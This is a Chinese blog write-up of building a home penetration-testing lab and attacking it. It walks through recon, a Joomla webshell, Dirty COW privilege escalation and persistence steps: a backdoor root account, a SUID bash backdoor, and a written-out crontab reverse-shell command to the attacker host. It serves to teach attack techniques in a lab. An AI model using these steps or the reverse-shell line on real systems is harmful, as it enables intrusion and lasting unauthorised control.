【靶场设计和渗透】

这篇具有很好参考价值的文章主要介绍了【靶场设计和渗透】。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

目录

一、前言

二、靶场设计

1、局域网

 2、说明

三、渗透测试

1、信息收集

2、漏洞利用

四、后渗透利用

1、提权

2、权限维持


一、前言

为了深入贯彻学习网络安全法律法规,深入学习渗透测试知识,强化实战技能............

网络靶场功能模块设计,靶场渗透,安全,权限维持

 编不出来了,反正今天的主题就是设计一个靶场然后渗透一遍。

二、靶场设计

1、局域网

整体资产设计:

资产

IP

说明

数量

Kali Linux

192.168.43.203

黑客攻击机,桥接模式

1

Centos

网卡1:192.168.43.57

网卡2:192.168.93.100

搭建某web服务,为出网机,桥接和仅主机双网卡模式

1

Ubantu

192.168.93.120

内网Linux主机

1

Window7 PC

192.168.93.30

未知,待探测

1

Windows server2008

192.168.93.20

未知,待探测

1

Windows server2012

IP未知,待探测

未知,待探测

1

物理主机

192.168.43.151

真实主机

1

整体拓扑:

网络靶场功能模块设计,靶场渗透,安全,权限维持

VMware中网卡呈现:
网络靶场功能模块设计,靶场渗透,安全,权限维持

 2、说明

  • 启动VMware Workstation并打开要编辑网卡的虚拟机;点击菜单栏上的“编辑虚拟机设置”;在虚拟机设置对话框中,选择“网络适;在此选项卡中,更改虚拟机的网络连接类型和网卡设置;如果要使用主机网络连接类型,请选择“桥接”选项,并选择要使用的物理网卡;如果要使用NAT网络连接类型,请选择“NAT”选项,并选择要使用的网卡;如果要使用虚拟网络连接类型,请选择“虚拟网络”选项,并选择要使用的虚拟网络;如果需要手动配置IP地址、子网掩码、网关和DNS服务器,可以选择“手动”选项,并输入相应的信息;完成设置后,单击“确定”按钮保存更改。添加网卡VMnet2,模式仅主机模式,即将虚拟机连接到计算机的物理网络上,使得虚拟机可以像真实计算机一样通过局域网访问 Internet 和其他网络设备。网段为192.168.93.0 子网掩码为255.255.255.0,采用DHCP进行自动IP地址分配。
  • Kali Linux网络环境配置:编辑Kali Linux网络配置文件/etc/network/intrfaces,修改配置文件使其动态获取桥接网卡IP地址。
  • Centos部署:打开终端,可以使用任何终端应用程序来执行以下命令;查看当前网络配置:可以使用命令“ifconfig”或“ip addr”来查看当前网络配置;找到要配置的网络接口名称。可以在上一步中查看网络接口的名称;打开网络配置文件:打开配置文件“/etc/sysconfig/network-scripts/ifcfg-<网络接口名称>”,例如,“/etc/sysconfig/network-scripts/ifcfg-eth0”;配置网络接口:在文件中,可以设置各种选项,如IP地址、子网掩码、网关、DNS服务器、MAC地址等。部署模式为双网卡,eth0为桥接模式,网卡IP地址:192.168.43.57,子网255.255.255.0,该网卡能够出网,模拟为公网服务器;eth1为仅主机网卡,网卡IP地址为:192.168.93.100,子网255.255.255.0,该网卡不能出网。需满足Centos能够和物理主机、Kali Linux通信,且能够和内网主机PC通信。
  • Ubantu网卡配置: 打开终端:可以使用任何终端应用程序来执行以下命令;查看当前网络配置:可以使用命令“ifconfig”或“ip addr”来查看当前网络配置;找到要配置的网络接口名称:网络接口名称可能是“eth0”、“enp0s3”等。可以在上一步中查看网络接口的名称;打开网络配置文件:打开配置文件“/etc/netplan/01-netcfg.yaml”;配置网络接口:在文件中,设置各种选项,如IP地址、子网掩码、网关、DNS服务器等。配置该Linux主机网卡为仅主机模式,IP的地址为:192.168.93.120,子网255.255.255.0;能和Centos通信。
  • Window7部署:Window7网卡VMnet2,模式为仅主机模式,固定IP地址为192.168.93.30 子网掩码255.255.255.0;不能和物理主机、Kali Linux通信。
  • AD域内主机部署:Windows server2008,网卡仅主机模式,IP地址:192.168.93.20,子网255.255.255.0,纯内网服务器,其他信息待渗透;Windows server2012,网卡仅主机模式,IP地址:未知,需渗透,纯内网主机。
  • Linux内核漏洞:脏牛漏洞+Joomla系统=3.9漏洞部署于centos系统之上。

三、渗透测试

1、信息收集

本节内容将使用工具Nmap进行信息收集演示,获取目标系统、网络或应用程序的相关信息,包括IP地址、域名、服务器类型、网络拓扑结构、开放端口、操作系统版本、应用程序版本等。已知待测试网段为:192.168.43.0/24。步骤如下:

  • 存活主机探测:结果显示主机192.168.43.57、192.168.43.151(物理主机)、192.168.43.203(Kali Linux)、192.168.43.125(手机无线网关)存活,如图4-1所示。

网络靶场功能模块设计,靶场渗透,安全,权限维持

操作系统、端口服务探测:结果显示主机192.168.43.57为Linux主机,内核是2.6.32-3.10版本,主机开启了22-ssh、80-http、3306-Mysql服务,如图4-2所示。

网络靶场功能模块设计,靶场渗透,安全,权限维持

  •  验证服务信息:ssh服务暂时无法利用;验证http服务存在,图4-3所示,可进一步利用。

网络靶场功能模块设计,靶场渗透,安全,权限维持



  • 继续探测http服务信息:渗透插件Wappalyzer识别web服务使用的技术,见表4-1、图4-4;Metasploit识别具体地点joomla版本信息,见图4-5;查看robots.txt文件、扫描网站泄露文件信息,图4-6所示。

表4-1 汇总Joomla使用技术框架

技术

说明

CMS

Joomla3.9.12

后端语言

PHP

字体脚本

Google Font API

JavaScript库

jQuery Migrate 1.4.1、jQuery 1.12.4

反向代理

Nginx 1.9.4

Web服务器

Nginx 1.9.4

UI框架

Bootstrap

网络靶场功能模块设计,靶场渗透,安全,权限维持

图4-4 Wappalyzer插件收集Joomla技术信息

网络靶场功能模块设计,靶场渗透,安全,权限维持

图4-5 Metasploit识别Joomla信息

网络靶场功能模块设计,靶场渗透,安全,权限维持

图5-6 Dirsearch 爆破目录文件信息

  • 存在文件泄露数据库信息,如图4-7所示。

网络靶场功能模块设计,靶场渗透,安全,权限维持

图4-7 数据库信息泄露

2、漏洞利用

本节将会演示漏洞的利用方法和过程:

  • Kali Linux自带的Mysql登录192.168.43.57数据库后台:有关键数据库Joomla,关键数据表am2zu_users、umnbt_users,如下图4-8所示。

网络靶场功能模块设计,靶场渗透,安全,权限维持

网络靶场功能模块设计,靶场渗透,安全,权限维持网络靶场功能模块设计,靶场渗透,安全,权限维持

图4-8 攻击数据库

  • 查询关键字段值(图),各个字段的Mysql数据类型描述(图);尝试修改表中的用户密码信息,修改成功,但是无法登录,原因是使用了token技术将用户进行了绑定操作,密码做了加盐处理,如图4-9所示。

网络靶场功能模块设计,靶场渗透,安全,权限维持

网络靶场功能模块设计,靶场渗透,安全,权限维持

图4-9 攻击数据库信息

  • 尝试导出各个字段的类型,进行新用户插入操作,如图4-10所示:

网络靶场功能模块设计,靶场渗透,安全,权限维持

图4-10 攻击数据库字段

将得到的表中的数据类型进行归纳,Joomla CMS官网给出官方重置管理员密码操作,尝试进行插入数据操作,如图4-11;成功插入管理员账号密码,如下图4-12。

网络靶场功能模块设计,靶场渗透,安全,权限维持

图4-11 Joomla官方重置管理员密码操作

网络靶场功能模块设计,靶场渗透,安全,权限维持

图 4-12 数据库修管理员密码

以管理员身份登录网站,图4-13;发现网站有文件上传和文件写入漏洞,写入PHP木马,图4-14、图4-15。

网络靶场功能模块设计,靶场渗透,安全,权限维持

图4-13 成功攻击web系统

网络靶场功能模块设计,靶场渗透,安全,权限维持

图4-14 Joomla 文件上传漏洞

绝对路径是 http://192.168.43.57/templates/beez3/html/hhh.php,蚁剑链接,发现对一些执行命令的函数进行了禁用,使用插件进行绕过,如下图4-16和4-17。

网络靶场功能模块设计,靶场渗透,安全,权限维持

图4-16 蚁剑webshell管理工具

网络靶场功能模块设计,靶场渗透,安全,权限维持

图4-17 蚁剑绕过Disable_function

内网主机无法出网,无法反弹shell,继续查看被控主机文件,发现/tmp/mysql/目录下有敏感文件,如图4-18。

网络靶场功能模块设计,靶场渗透,安全,权限维持

图4-18 发现泄露密码账号信息

结合之前信息收集到的22-ssh服务信息,尝试进行远程连接,成功远程,如图4-19。

网络靶场功能模块设计,靶场渗透,安全,权限维持

图4-19 Xshell远程连接目标主机

四、后渗透利用

1、提权

  • 收集主机信息:内核发行版本信息、网络信息,Linux内核2.6.32,eth0:192.168.43.57,eth1:192.168.93.100,主机内核版本太低,尝试使用内核漏洞进行提权。如图4-20使用Searchsploit工具进行内核版本漏洞利用,可使用脏牛漏洞提权。

网络靶场功能模块设计,靶场渗透,安全,权限维持

图4-20 使用Searchsploit利用内核漏洞

  • 将生成的c代码上传至漏洞主机上执行gcc编译,如图4-21;运行编译后的文件就可以对/etc/passwd文件进行修改,成功提权至root权限,至此该192.168.43.57主机已经完全被制下来了,如图4-22。

网络靶场功能模块设计,靶场渗透,安全,权限维持

图4-21 上传脏牛漏洞exp

网络靶场功能模块设计,靶场渗透,安全,权限维持

图4-22 编译执行exp后提权成功

2、权限维持

  • 后门维持探索:添加root账户:添加账户为r00t,密码为password的root账户,图4-23。

网络靶场功能模块设计,靶场渗透,安全,权限维持

图4-23 添加root权限账户维持权限

  • 设置suid位权限:设置了suid位权限的文件在执行时具有该文件拥有者的权限,因此可以在root权限时留一个bash文件的后门,在低权限的时候能够通过该后门获得root权限,如图4-24。  

     网络靶场功能模块设计,靶场渗透,安全,权限维持

    图4-24 SUID权限维持

  • 写入计划任务:将反弹命令写入到Linux的计划任务中,周期执行shell反弹计划,如图4-25,命令:echo -e "*/1 * * * * exec 9<>/dev/tcp/192.168.43.203/8888;exec 0<&9;exec 1>&9 2>&1;/bin/bash --noprofile -i" | crontab -。 

网络靶场功能模块设计,靶场渗透,安全,权限维持

图4-25 计划任务权限维持文章来源地址https://www.toymoban.com/news/detail-823421.html

  • 告辞,后面在进行内网横移和AD渗透。

到了这里,关于【靶场设计和渗透】的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • 【网络安全】DVWA靶场实战&BurpSuite内网渗透

    我们先来认识一下BurpSuite中有哪些攻击模式,然后开始实战操作 下面攻击案例即将使用,对单个参数进行攻击破解 联想战争中狙击手的作用,一次只能击杀一名敌人 联想古代的攻城锤,特点就是攻击范围比狙击手大,但是效率不一定高 可以设置多个攻击字段,但是payload值

    2024年02月13日
    浏览(56)
  • 安全开发-PHP应用&留言板功能&超全局变量&数据库操作&第三方插件引用&后台模块&Session&Cookie&Token&身份验证&唯一性

    DW + PHPStorm + PhpStudy + Navicat Premium DW : HTMLJSCSS开发 PHPStorm : 专业PHP开发IDE PhpStudy :Apache MYSQL环境 Navicat Premium: 全能数据库管理工具 1、数据库名,数据库表名,数据库列名 2、数据库数据,格式类型,长度,键等 PHP函数:连接,选择,执行,结果,关闭等 参考:https://www.runoo

    2024年02月17日
    浏览(61)
  • ant design pro集成阿里低代码引擎lowcode-engine,并实现与数据库结合实现低代码模块的创建、设计、发布等功能

    阿里低代码引擎是一款为低代码平台开发者提供的,具备强大定制扩展能力的低代码设计器研发框架。 本文主要介绍如何在ant design pro项目中集成阿里低代码引擎lowcode-engine。 根据官方文档,已有项目要集成低代码引擎,至少需要三步,以下我们以ant desigin pro5项目为例,来集

    2024年02月22日
    浏览(54)
  • ERP系统有哪些功能模块?

    现在市面上的管理软件有很多,不少企业都会去选择一些操作简单便捷的软件,优化工作流程,提高工作效率,其中ERP系统就是常见的一种,ERP是企业资源计划(Enterprise Resource Planning)的简称,是可以为企业员工及决策层提供决策手段的管理平台。ERP是一个庞大的数据库管理系

    2024年02月04日
    浏览(50)
  • 网易云音乐开发--search模块基本功能实现(除历史记录模块)

    老样子搭建一个search搜索页面  还有一块没有实现,那就是让输入框默认的文本变换颜色  微信小程序: input输入框placeholder样式的修改_微信小程序placeholder样式_酷伊奥的博客-CSDN博客  百度搜索了一下,找到了这个大佬的解决方案。很nice 查看文档 网易云音乐 NodeJS 版 API (b

    2024年02月06日
    浏览(79)
  • msf常用模块功能整理

    更新中 shell中直接输入msfconsole开始运行 use +模块路径 使用模块 search+模块 用来搜索模块 back 返回主界面 模块中: info 查看模块信息 show options 查看模块设置项 show targets 显示可选择的target(targert更像是给你选项,你去细化攻击细节,但是明明目标机器是64位系统,我选

    2024年02月04日
    浏览(56)
  • springboot中各个模块的功能

    Entity:实体层,数据库在项目中对应的类。放置一个个实体,及其相应的set、get方法。 Entity层中的类大多数是数据方面的,例如数据库中有负责登陆的User表(ID、UserName,Password),在Entity层就需要用private定义与数据库中一样的字段(ID、UserName,Password)以及这些字段

    2024年02月13日
    浏览(53)
  • 前端022_广告模块_修改功能

    需求分析 当点击 编辑 按钮后,弹出编辑窗口,并查询出分类相关信息进行渲染。修改后点击 确定 提交修改后的数据。 请求URL: /article/advert/{id} 请求方式: get 描述:通过广告 ID 查询数据接口 mock.js 配置:

    2024年02月05日
    浏览(88)
  • 前端013_标签模块_新增功能

    点击 新增 按钮后,对话框形式弹出新增窗口 输入类别信息后,点击 确定 提交表单数据; 新增和修改功能共用一个组件,我们将它作为子组件引入到列表查询父组件中,下面先将组件定义出来。 弹出功能参考:https://element.eleme.cn/#/zh-CN/component/dialog#zi-ding-yi-nei-rong el-dialog标

    2024年02月04日
    浏览(42)
  • 前端020_广告模块_列表功能

    广告模块主要针对博客门户广告处统一的进行管理。 首先开发模块中的列表功能,包含数据列表、分页。 请求URL: /article/advert/search 请求方式: post 描述: 广告分页列表 mock.js 配置: 带分页功能,每页显示20条

    2024年02月05日
    浏览(93)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包